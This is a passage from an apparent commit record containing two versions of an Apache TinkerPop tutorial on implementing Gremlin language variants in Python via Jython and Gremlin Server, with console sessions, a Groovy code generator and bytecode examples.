02:25:11)\n[Java HotSpot(TM) 64-Bit Server VM (Oracle Corporation)] on java1.8.0_40\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import sys\n# this list is longer than displayed, including all jars in lib\/, not just Apache TinkerPop jars\n# there is probably a more convenient way of importing jars in Jython though, at the time of writing, no better solution was found.\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-console-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-core-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-driver-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-shaded-x.y.z.jar\")\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/ext\/tinkergraph-gremlin\/lib\/tinkergraph-gremlin-x.y.z.jar\")\n# import Java classes\n>>> from org.apache.tinkerpop.gremlin.tinkergraph.structure import TinkerFactory\n>>> from org.apache.tinkerpop.gremlin.process.traversal.dsl.graph import __\n>>> from org.apache.tinkerpop.gremlin.process.traversal import *\n>>> from org.apache.tinkerpop.gremlin.structure import *\n# create the toy \"modern\" graph and spawn a GraphTraversalSource\n>>> graph = TinkerFactory.createModern()\n>>> g = graph.traversal()\n# The Jython shell does not automatically iterate Iterators like the GremlinConsole\n>>> g.V().hasLabel(\"person\").out(\"knows\").out(\"created\")\n[GraphStep(vertex,[]), HasStep([~label.eq(person)]), VertexStep(OUT,[knows],vertex), VertexStep(OUT,[created],vertex)]\n# toList() will do the iteration and return the results as a list\n>>> g.V().hasLabel(\"person\").out(\"knows\").out(\"created\").toList()\n[v[5], v[3]]\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()\n[ripple, lop]\n# results can be interacted with using Python\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()[0]\nu'ripple'\n>>> g.V().repeat(__.out()).times(2).values(\"name\").toList()[0][0:3].upper()\nu'RIP'\n>>>\n----\n\nMost every JSR-223 `ScriptEngine` language will allow the developer to immediately interact with `GraphTraversal`.\nThe benefit of this model is that nearly every major programming language has a respective `ScriptEngine`:\nlink:https:\/\/en.wikipedia.org\/wiki\/Nashorn_(JavaScript_engine)[JavaScript], link:http:\/\/groovy-lang.org\/[Groovy],\nlink:http:\/\/www.scala-lang.org\/[Scala], Lisp (link:https:\/\/clojure.org\/[Clojure]), link:http:\/\/jruby.org\/[Ruby], etc. A\nlist of implementations is provided link:https:\/\/en.wikipedia.org\/wiki\/List_of_JVM_languages[here].\n\n==== Traversal Wrappers\n\nWhile it is possible to simply interact with Java classes in a `ScriptEngine` implementation, such Gremlin language\nvariants will not leverage the unique features of the host language. It is for this reason that JVM-based language\nvariants such as link:https:\/\/github.com\/mpollmeier\/gremlin-scala[Gremlin-Scala] were developed. Scala provides many\nsyntax niceties not available in Java. To leverage these niceties, Gremlin-Scala \"wraps\" `GraphTraversal` in order to\nprovide Scala-idiomatic extensions. Another example is Apache TinkerPop's Gremlin-Groovy which does the same via the\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#sugar-plugin[Sugar plugin], but uses\nlink:http:\/\/groovy-lang.org\/metaprogramming.html[meta-programming] instead of object wrapping, where \"behind the\nscenes,\" Groovy meta-programming is doing object wrapping.\n\nThe Jython example below uses Python meta-programming to add functionality to `GraphTraversal`. In particular, the\n`__getitem__` and `__getattr__` \"magic methods\" are leveraged.\n\n[source,python]\n----\ndef getitem_bypass(self, index):\n if isinstance(index,int):\n return self.range(index,index+1)\n elif isinstance(index,slice):\n return self.range(index.start,index.stop)\n else:\n return TypeError('Index must be int or slice')\");\nGraphTraversal.__getitem__ = getitem_bypass\nGraphTraversal.__getattr__ = lambda self, key: self.values(key)\n----\n\nThe two methods `__getitem__` and `__getattr__` support Python _slicing_ and _object attribute interception_,\nrespectively. In this way, the host language is able to use its native constructs in a meaningful way within a\nGremlin traversal.\n\nIMPORTANT: Gremlin-Java serves as the standard\/default representation of the Gremlin traversal language. Any Gremlin\nlanguage variant **must** provide all the same functionality (methods) as `GraphTraversal`, but **can** extend it\nwith host language specific constructs. This means that the extensions **must** compile to `GraphTraversal`-specific\nsteps. A Gremlin language variant **should not** add steps\/methods that do not exist in `GraphTraversal`. If an extension\nis desired, the language variant designer should submit a proposal to link:http:\/\/tinkerpop.apache.org[Apache TinkerPop]\nto have the extension added to a future release of Gremlin.\n\n[[using-python-and-remoteconnection]]\n=== Using Python and RemoteConnection\n\nimage:python-logo.png[width=125,float=left,link=\"https:\/\/www.python.org\/\"] The JVM is a powerful piece of technology\nthat has, over the years, become a meeting ground for developers from numerous language communities. However, not all\napplications will use the JVM. Given that Apache TinkerPop is a Java-framework, there must be a way for two different\nvirtual machines to communicate traversals and their results. This section presents the second Gremlin language\nvariant implementation model which does just that.\n\nNOTE: Apache TinkerPop is a JVM-based graph computing framework. Most graph databases and processors today are built\non the JVM. This makes it easy for these graph system providers to implement Apache TinkerPop. However, TinkerPop is more\nthan its graph API and tools -- it is also the Gremlin traversal machine and language. While Apache's Gremlin traversal\nmachine was written for the JVM, its constructs are simple and can\/should be ported to other VMs for those graph systems\nthat are not JVM-based. A theoretical review of the concepts behind the Gremlin traversal machine is provided in\nlink:http:\/\/arxiv.org\/abs\/1508.03843[this article].\n\nThis section's Gremlin language variant design model does not leverage the JVM directly. Instead, it constructs a\n`Bytecode` representation of a `Traversal` that will ultimately be evaluated by `RemoteConnection` (e.g. GremlinServer).\nIt is up to the language variant designer to choose a _language driver_ to use for submitting the generated bytecode and\ncoercing its results. The language driver is the means by which, for this example, the CPython\nVM communicates with the JVM.\n\n[source,bash]\n----\n# sudo easy_install pip\n$ pip install gremlinpython\n----\n\nThe Groovy source code below uses Java reflection to generate a Python class that is in 1-to-1 correspondence with\nGremlin-Java.\n\n[source,groovy]\n----\nclass GraphTraversalSourceGenerator {\n\n public static void create(final String graphTraversalSourceFile) {\n\n final StringBuilder pythonClass = new StringBuilder()\n\n pythonClass.append(\"from .traversal import Traversal\\n\")\n pythonClass.append(\"from .traversal import TraversalStrategies\\n\")\n pythonClass.append(\"from .traversal import Bytecode\\n\")\n pythonClass.append(\"from ..driver.remote_connection import RemoteStrategy\\n\")\n pythonClass.append(\"from .. import statics\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ GraphTraversalSource \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\n \"\"\"class GraphTraversalSource(object):\n def __init__(self, graph, traversal_strategies, bytecode=None):\n self.graph = graph\n self.traversal_strategies = traversal_strategies\n if bytecode is None:\n bytecode = Bytecode()\n self.bytecode = bytecode\n def __repr__(self):\n return \"graphtraversalsource[\" + str(self.graph) + \"]\"\n\"\"\")\n GraphTraversalSource.getMethods(). \/\/ SOURCE STEPS\n findAll { GraphTraversalSource.class.equals(it.returnType) }.\n findAll {\n !it.name.equals(\"clone\") &&\n !it.name.equals(TraversalSource.Symbols.withRemote)\n }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n source = GraphTraversalSource(self.graph, TraversalStrategies(self.traversal_strategies), Bytecode(self.bytecode))\n source.bytecode.add_source(\"${SymbolHelper.toJava(method)}\", *args)\n return source\n\"\"\")\n }\n pythonClass.append(\n \"\"\" def withRemote(self, remote_connection):\n source = GraphTraversalSource(self.graph, TraversalStrategies(self.traversal_strategies), Bytecode(self.bytecode))\n source.traversal_strategies.add_strategies([RemoteStrategy(remote_connection)])\n return source\n\"\"\")\n GraphTraversalSource.getMethods(). \/\/ SPAWN STEPS\n findAll { GraphTraversal.class.equals(it.returnType) }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n traversal = GraphTraversal(self.graph, self.traversal_strategies, Bytecode(self.bytecode))\n traversal.bytecode.add_step(\"${SymbolHelper.toJava(method)}\", *args)\n return traversal\n\"\"\")\n }\n pythonClass.append(\"\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ GraphTraversal \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\n \"\"\"class GraphTraversal(Traversal):\n def __init__(self, graph, traversal_strategies, bytecode):\n Traversal.__init__(self, graph, traversal_strategies, bytecode)\n def __getitem__(self, index):\n if isinstance(index, int):\n return self.range(index, index + 1)\n elif isinstance(index, slice):\n return self.range(index.start, index.stop)\n else:\n raise TypeError(\"Index must be int or slice\")\n def __getattr__(self, key):\n return self.values(key)\n\"\"\")\n GraphTraversal.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { !it.name.equals(\"clone\") }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n self.bytecode.add_step(\"${SymbolHelper.toJava(method)}\", *args)\n return self\n\"\"\")\n };\n pythonClass.append(\"\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ AnonymousTraversal \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\"class __(object):\\n\");\n __.class.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { Modifier.isStatic(it.getModifiers()) }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" @staticmethod\n def ${method}(*args):\n return GraphTraversal(None, None, Bytecode()).${method}(*args)\n\"\"\")\n };\n pythonClass.append(\"\\n\\n\")\n \/\/ add to gremlin.python.statics\n __.class.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { Modifier.isStatic(it.getModifiers()) }.\n findAll { !it.name.equals(\"__\") }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach {\n pythonClass.append(\"def ${it}(*args):\\n\").append(\" return __.${it}(*args)\\n\\n\")\n pythonClass.append(\"statics.add_static('${it}', ${it})\\n\\n\")\n }\n pythonClass.append(\"\\n\\n\")\n\n\/\/ save to a python file\n final File file = new File(graphTraversalSourceFile);\n file.delete()\n pythonClass.eachLine { file.append(it + \"\\n\") }\n }\n}\n----\n\nWhen the above Groovy script is evaluated (e.g. in GremlinConsole), **Gremlin-Python** is born. The generated Python\nfile is similar to the one available at\nlink:https:\/\/github.com\/apache\/tinkerpop\/blob\/x.y.z\/gremlin-python\/src\/main\/jython\/gremlin_python\/process\/graph_traversal.py[graph_traversal.py].\nIt is important to note that there is a bit more to Gremlin-Python in that there also exists Python implementations\nof `TraversalStrategies`, `Traversal`, `Bytecode`, etc. Please review the full implementation of Gremlin-Python\nlink:https:\/\/github.com\/apache\/tinkerpop\/tree\/x.y.z\/gremlin-python\/src\/main\/jython\/gremlin_python[here].\n\nNOTE: In practice, TinkerPop uses the Groovy's `GStringTemplateEngine` to help with the code generation task described\nabove and automates that generation as part of the standard build with Maven using the `gmavenplus-plugin`. See the\n`gremlin-python` link:https:\/\/github.com\/apache\/tinkerpop\/blob\/x.y.z\/gremlin-python\/pom.xml[pom.xml] for more details.\n\nOf particular importance is Gremlin-Python's implementation of `Bytecode`.\n\n[source,python]\n----\nclass Bytecode(object):\n def __init__(self, bytecode=None):\n self.source_instructions = []\n self.step_instructions = []\n self.bindings = {}\n if bytecode is not None:\n self.source_instructions = list(bytecode.source_instructions)\n self.step_instructions = list(bytecode.step_instructions)\n\n def add_source(self, source_name, *args):\n newArgs = ()\n for arg in args:\n newArgs = newArgs + (self.__convertArgument(arg),)\n self.source_instructions.append((source_name, newArgs))\n return\n\n def add_step(self, step_name, *args):\n newArgs = ()\n for arg in args:\n newArgs = newArgs + (self.__convertArgument(arg),)\n self.step_instructions.append((step_name, newArgs))\n return\n\n def __convertArgument(self,arg):\n if isinstance(arg, Traversal):\n self.bindings.update(arg.bytecode.bindings)\n return arg.bytecode\n elif isinstance(arg, tuple) and 2 == len(arg) and isinstance(arg[0], str):\n self.bindings[arg[0]] = arg[1]\n return Binding(arg[0],arg[1])\n else:\n return arg\n----\n\nAs `GraphTraversalSource` and `GraphTraversal` are manipulated, the step-by-step instructions are written to `Bytecode`.\nThis bytecode is simply a list of lists. For instance, `g.V(1).repeat(out('knows').hasLabel('person')).times(2).name` has\nthe `Bytecode` form:\n\n[source,json]\n----\n[\n [\"V\", [1]],\n [\"repeat\", [[\n [\"out\", [\"knows\"]]\n [\"hasLabel\", [\"person\"]]]]]\n [\"times\", [2]]\n [\"values\", [\"name\"]]\n]\n----\n\nThis nested list representation is ultimately converted by the language variant into link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#graphson-reader-writer[GraphSON]\nfor serialization to a `RemoteConnection` such as GremlinServer.\n\n[source,bash]\n----\n$ bin\/gremlin-server.sh install org.apache.tinkerpop gremlin-python x.y.z\n$ bin\/gremlin-server.sh conf\/gremlin-server-modern-py.yaml\n[INFO] GremlinServer -\n \\,,,\/\n (o o)\n---oOOo-(3)-oOOo---\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-modern-py.yaml\n[INFO] MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics\n[INFO] GraphManager - Graph [graph] was successfully configured via [conf\/tinkergraph-empty.properties].\n[INFO] ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*\n[INFO] ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.\n[INFO] Logger - 56 attributes loaded from 90 stream(s) in 21ms, 56 saved, 1150 ignored: [\"Ant-Version\", \"Archiver-Version\", \"Bnd-LastModified\", \"Boot-Class-Path\", \"Build-Jdk\", \"Build-Version\", \"Built-By\", \"Bundle-Activator\", \"Bundle-BuddyPolicy\", \"Bundle-ClassPath\", \"Bundle-Description\", \"Bundle-DocURL\", \"Bundle-License\", \"Bundle-ManifestVersion\", \"Bundle-Name\", \"Bundle-RequiredExecutionEnvironment\", \"Bundle-SymbolicName\", \"Bundle-Vendor\", \"Bundle-Version\", \"Can-Redefine-Classes\", \"Created-By\", \"DynamicImport-Package\", \"Eclipse-BuddyPolicy\", \"Export-Package\", \"Extension-Name\", \"Extension-name\", \"Fragment-Host\", \"Gremlin-Plugin-Dependencies\", \"Ignore-Package\", \"Implementation-Build\", \"Implementation-Title\", \"Implementation-URL\", \"Implementation-Vendor\", \"Implementation-Vendor-Id\", \"Implementation-Version\", \"Import-Package\", \"Include-Resource\", \"JCabi-Build\", \"JCabi-Date\", \"JCabi-Version\", \"Main-Class\", \"Main-class\", \"Manifest-Version\", \"Originally-Created-By\", \"Package\", \"Private-Package\", \"Require-Capability\", \"Specification-Title\", \"Specification-Vendor\", \"Specification-Version\", \"Tool\", \"Url\", \"X-Compile-Source-JDK\", \"X-Compile-Target-JDK\", \"hash\", \"version\"]\n[INFO] ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[tinkergraph[vertices:0 edges:0], standard]\n[INFO] OpLoader - Adding the standard OpProcessor.\n[INFO] OpLoader - Adding the session OpProcessor.\n[INFO] OpLoader - Adding the traversal OpProcessor.\n[INFO] TraversalOpProcessor - Initialized cache for TraversalOpProcessor with size 1000 and expiration time of 600000 ms\n[INFO] GremlinServer - Executing start up LifeCycleHook\n[INFO] Logger$info - Executed once at startup of Gremlin Server.\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 4 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nWithin the CPython console, it is possible to evaluate the following.\n\n[source,python]\n----\nPython 2.7.2 (default, Oct 11 2012, 20:14:37)\n[GCC 4.2.1 Compatible Apple Clang 4.0 (tags\/Apple\/clang-418.0.60)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> from gremlin_python import statics\n>>> from gremlin_python.structure.graph import Graph\n>>> from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection\n# loading statics enables __.out() to be out() and P.gt() to be gt()\n>>> statics.load_statics(globals())\n>>> graph = Graph()\n>>> g = graph.traversal().withRemote(DriverRemoteConnection('ws:\/\/localhost:8182\/gremlin','g'))\n# nested traversal with Python slicing and attribute interception extensions\n>>> g.V().hasLabel(\"person\").repeat(both()).times(2).name[0:2].toList()\n[u'marko', u'marko']\n>>> g = g.withComputer()\n>>> g.V().hasLabel(\"person\").repeat(both()).times(2).name[0:2].toList()\n[u'peter', u'peter']\n# a complex, nested multi-line traversal\n>>> g.V().match( \\\n... as_(\"a\").out(\"created\").as_(\"b\"), \\\n... as_(\"b\").in_(\"created\").as_(\"c\"), \\\n... as_(\"a\").out(\"knows\").as_(\"c\")). \\\n... select(\"c\"). \\\n... union(in_(\"knows\"),out(\"created\")). \\\n... name.toList()\n[u'ripple', u'marko', u'lop']\n>>>\n----\n\nIMPORTANT: Learn more about Apache TinkerPop's distribution of Gremlin-Python link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#gremlin-python[here].\n\n[[gremlin-language-variant-conventions]]\n== Gremlin Language Variant Conventions\n\nEvery programming language is different and a Gremlin language variant must ride the fine line between leveraging the\nconventions of the host language and ensuring consistency with Gremlin-Java. A collection of conventions for navigating\nthis dual-language bridge are provided.\n\n* If camelCase is not an accepted method naming convention in the host language, then the host language's convention can be used instead. For instance, in a Gremlin-Ruby implementation, `outE(\"created\")` may be `out_e(\"created\")`.\n* If Gremlin-Java step names conflict with the host language's reserved words, then a consistent amelioration should be used. For instance, in Python `as` is a reserved word, thus, Gremlin-Python uses `as_`.\n* If the host language does not use dot-notion for method chaining, then its method chaining convention should be used instead of going the route of operator overloading. For instance, a Gremlin-PHP implementation should do `$g->V()->out()`.\n* If a programming language does not support method overloading, then varargs and type introspection should be used. In Gremlin-Python, `*args` does just that.\n\n== Conclusion\n\nGremlin is a simple language because it uses two fundamental programming language constructs: *function composition*\nand *function nesting*. Because of this foundation, it is relatively easy to implement Gremlin in any modern programming\nlanguage. Two ways of doing this for the Python language were presented in this tutorial. One using Jython (on the JVM) and one using Python\n(on CPython). It is strongly recommended that language variant designers leverage (especially when not on the JVM)\nthe reflection-based source code generation technique presented. This method ensures that the language\nvariant is always in sync with the corresponding Apache TinkerPop Gremlin-Java release version. Moreover, it reduces\nthe chance of missing methods or creating poorly implemented methods. While Gremlin is simple, there are nearly 200\nstep variations in `GraphTraversal`. As such, mechanical means of host language embedding are strongly advised.\n","old_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n\nimage::apache-tinkerpop-logo.png[width=500,link=\"http:\/\/tinkerpop.apache.org\"]\n\n*x.y.z*\n\n== Gremlin Language Variants\n\nGremlin is an embeddable query language that can be represented using the constructs of a host programming language.\nAny programming language that supports link:https:\/\/en.wikipedia.org\/wiki\/Function_composition[function composition]\n(e.g. fluent chaining) and link:https:\/\/en.wikipedia.org\/wiki\/Nested_function[function nesting] (e.g. call stacks)\ncan support Gremlin. Nearly every modern programming language is capable of meeting both requirements.\nWith Gremlin, the distinction between a programming language and a query language is not as large as they\nhave historically been. For instance, with Gremlin-Java, the developer is able to have their application code and their\ngraph database queries at the same level of abstraction -- both written in Java. A simple example is presented below\nwhere the `MyApplication` Java class contains both application-level and database-level code written in Java.\n\nimage::gremlin-house-of-mirrors.png[width=1024]\n\nWARNING: This is an advanced tutorial intended for experts knowledgeable in Gremlin in particular and TinkerPop in general.\nMoreover, the audience should understand advanced programming language concepts such as reflection, meta-programming,\nsource code generation, and virtual machines.\n\n[source,java]\n----\npublic class MyApplication {\n\n public static void run(final String[] args) {\n\n \/\/ assumes args[0] is a configuration file location\n Graph graph = GraphFactory.open(args[0]);\n GraphTraversalSource g = graph.traversal();\n\n \/\/ assumes that args[1] and args[2] are range boundaries\n Iterator<Map<String,Double>> result =\n g.V().hasLabel(\"product\").\n order().by(\"unitPrice\", asc).\n range(Integer.valueOf(args[1]), Integer.valueOf(args[2])).\n valueMap(\"name\", \"unitPrice\")\n\n while(result.hasNext()) {\n Map<String,Double> map = result.next();\n System.out.println(map.get(\"name\") + \" \" + map.get(\"unitPrice\"));\n }\n }\n}\n----\n\nIn query languages like link:https:\/\/en.wikipedia.org\/wiki\/SQL[SQL], the user must construct a string representation of\ntheir query and submit it to the database for evaluation. This is because SQL cannot be expressed in Java as they use fundamentally\ndifferent constructs in their expression. The same example above is presented below using SQL and the\nlink:https:\/\/en.wikipedia.org\/wiki\/Java_Database_Connectivity[JDBC] interface. The take home point is that Gremlin does\nnot exist outside the programming language in which it will be used. Gremlin was designed to be able to be\nembedded in any modern programming language and thus, always free from the complexities of string manipulation as seen\nin other database and analytics query languages.\n\n[source,java]\n----\npublic class MyApplication {\n\n public static void run(final String[] args) {\n\n \/\/ assumes args[0] is a URI to the database\n Connection connection = DriverManager.getConnection(args[0])\n Statement statement = connection.createStatement();\n\n \/\/ assumes that args[1] and args[2] are range boundaries\n ResultSet result = statement.executeQuery(\n \"SELECT Products.ProductName, Products.UnitPrice \\n\" +\n \" FROM (SELECT ROW_NUMBER() \\n\" +\n \" OVER ( \\n\" +\n \" ORDER BY UnitPrice) AS [ROW_NUMBER], \\n\" +\n \" ProductID \\n\" +\n \" FROM Products) AS SortedProducts \\n\" +\n \" INNER JOIN Products \\n\" +\n \" ON Products.ProductID = SortedProducts.ProductID \\n\" +\n \" WHERE [ROW_NUMBER] BETWEEN \" + args[1] + \" AND \" + args[2] + \" \\n\" +\n \"ORDER BY [ROW_NUMBER]\"\n\n while(result.hasNext()) {\n result.next();\n System.out.println(result.getString(\"Products.ProductName\") + \" \" + result.getDouble(\"Products.UnitPrice\"));\n }\n }\n}\n----\n\nThe purpose of this tutorial is to explain how to develop a _Gremlin language variant_. That is, for those developers that\nare interested in supporting Gremlin in their native language and there currently does not exist a (good) Gremlin variant in\ntheir language, they can develop one for the Apache TinkerPop community (and their language community in general). In this\ntutorial, link:https:\/\/www.python.org\/[Python] will serve as the host language and two typical implementation models will be presented.\n\n1. <<using-jython-and-the-jvm,**Using Jython and the JVM**>>: This is perhaps the easiest way to produce a Gremlin\nlanguage variant. With link:https:\/\/www.jcp.org\/en\/jsr\/detail?id=223[JSR-223], any language compiler written for the JVM\ncan directly access the JVM and any of its libraries (including Gremlin-Java).\n\n2. <<using-python-and-gremlin-server,**Using Python and GremlinServer**>>: This model requires that there exist a Python\nclass that mimics Gremlin-Java's `GraphTraversal` API. With each method call of this Python class, Gremlin `Bytecode` is\ngenerated which is ultimately translated into a Gremlin variant that can execute the traversal (e.g. Gremlin-Java).\n\nIMPORTANT: Apache TinkerPop's Gremlin-Java is considered the idiomatic, standard implementation of Gremlin.\nAny Gremlin language variant, regardless of the implementation model chosen, **must**, within the constraints of the\nhost language, be in 1-to-1 correspondence with Gremlin-Java. This ensures that language variants are collectively\nconsistent and easily leveraged by anyone versed in Gremlin.\n\nIMPORTANT: The \"Gremlin-Python\" presented in this tutorial is basic and provided to show the primary techniques used to\nconstruct a Gremlin language variant. Apache TinkerPop distributes with a full fledged Gremlin-Python variant\nthat uses many of the techniques presented in this tutorial.\n\n[[language-drivers-vs-language-variants]]\n== Language Drivers vs. Language Variants\n\nBefore discussing how to implement a Gremlin language variant in Python, it is necessary to understand two concepts related to\nGremlin language development. There is a difference between a _language driver_ and a _language variant_ and it is important\nthat these two concepts (and their respective implementations) remain separate.\n\n=== Language Drivers\n\nimage:language-drivers.png[width=375,float=right] A Gremlin language driver is a software library that is able to\ncommunicate with a TinkerPop-enabled graph system whether directly via the JVM or indirectly via\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#gremlin-server[Gremlin Server] GremlinServer or some other\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connecting-via-remotegraph[RemoteConnection] enabled graph system.\nLanguage drivers are responsible for submitting Gremlin traversals to a TinkerPop-enabled graph system and\nreturning results to the developer that are within the developer's language's type system.\nFor instance, resultant doubles should be coerced to floats in Python.\n\nThis tutorial is not about language drivers, but about language variants. Moreover, community libraries should make this\ndistinction clear and **should not** develop libraries that serve both roles. Language drivers will be useful to a collection\nof Gremlin variants within a language community -- able to support `GraphTraversal`-variants as well as also other\nlink:https:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL]-variants (e.g. `SocialTraversal`).\n\nNOTE: `GraphTraversal` is a particular Gremlin domain-specific language (link:https:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL]),\nalbeit the most popular and foundational DSL. If another DSL is created, then the same techniques discussed in this tutorial\nfor `GraphTraversal` apply to `XXXTraversal`.\n\n=== Language Variants\n\nimage:language-variants.png[width=375,float=right] A Gremlin language variant is a software library that allows a developer\nto write a Gremlin traversal within their native programming language. The language variant is responsible for\ncreating Gremlin `Bytecode` that will ultimately be translated and compiled to a `Traversal` by a TinkerPop-enabled graph system.\n\nEvery language variant, regardless of the implementation details, will have to account for the four core concepts below:\n\n1. `Graph` (**data**): The source of the graph data to be traversed and the interface which enables the creation of a\n`GraphTraversalSource` (via `graph.traversal()`).\n\n2. `GraphTraversalSource` (**compiler**): This is the typical `g` reference. A `GraphTraversalSource` maintains the\n`withXXX()`-strategy methods as well as the \"traversal spawn\"-methods such as `V()`, `E()`, `addV()`, etc.\nA traversal source's registered `TraversalStrategies` determine how the submitted traversal will be ultimately evaluated.\n\n3. `GraphTraversal` (**function composition**): A graph traversal maintains the computational steps such as `out()`, `groupCount()`,\n`match()`, etc. This fluent interface supports method chaining and thus, a linear \"left-to-right\" representation of a traversal\/query.\n\n4. `__` (**function nesting**) : The anonymous traversal class is used for passing a traversal as an argument to a parent step.\nFor example, in `repeat(__.out())`, `__.out()` is an anonymous traversal passed to the traversal parent `repeat()`.\nAnonymous traversals enable the \"top-to-bottom\" representation of a traversal.\n\n5. `Bytecode` (**language agnostic encoding**): The source and traversal steps and their arguments are encoded in a\nlanguage agnostic representation called Gremlin bytecode. This representation is a nested list of the form `[step,[args*]]*`.\n\nBoth `GraphTraversal` and `__` define the structure of the Gremlin language. Gremlin is a _two-dimensional language_ supporting\nlinear, nested step sequences. Historically, many Gremlin language variants have failed to make the distinctions above clear\nand in doing so, either complicate their implementations or yield variants that are not in 1-to-1 correspondence with Gremlin-Java.\nBy keeping these concepts clear when designing a language variant, the construction of the Gremlin bytecode representation is\neasy.\n\nIMPORTANT: The term \"Gremlin-Java\" denotes the language that is defined by `GraphTraversalSource`, `GraphTraversal`,\nand `__`. These three classes exist in `org.apache.tinkerpop.gremlin.process.traversal.dsl.graph` and form the definitive\nrepresentation of the Gremlin traversal language.\n\n== Gremlin-Jython and Gremlin-Python\n\n[[using-jython-and-the-jvm]]\n=== Using Jython and the JVM\n\nimage:jython-logo.png[width=200,float=left,link=\"http:\/\/www.jython.org\/\"] link:http:\/\/www.jython.org\/[Jython] provides a\nlink:https:\/\/www.jcp.org\/en\/jsr\/detail?id=223[JSR-223] `ScriptEngine` implementation that enables the evaluation of\nPython on the link:https:\/\/en.wikipedia.org\/wiki\/Java_virtual_machine[Java virtual machine]. In other words, Jython's\nvirtual machine is not the standard link:https:\/\/wiki.python.org\/moin\/CPython[CPython] reference implementation\ndistributed with most operating systems, but instead the JVM. The benefit of Jython is that Python code and classes\ncan easily interact with the Java API and any Java packages on the `CLASSPATH`. In general, any JSR-223 Gremlin language\nvariant is trivial to \"implement.\"\n\n[source,python]\n----\nJython 2.7.0 (default:9987c746f838, Apr 29 2015, 02:25:11)\n[Java HotSpot(TM) 64-Bit Server VM (Oracle Corporation)] on java1.8.0_40\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import sys\n# this list is longer than displayed, including all jars in lib\/, not just Apache TinkerPop jars\n# there is probably a more convenient way of importing jars in Jython though, at the time of writing, no better solution was found.\n>>> sys.path.append(\"\/usr\/local\/apache-gremlin-console-x.y.z-standalone\/lib\/gremlin-console-x.y.z.jar\")\n>>> 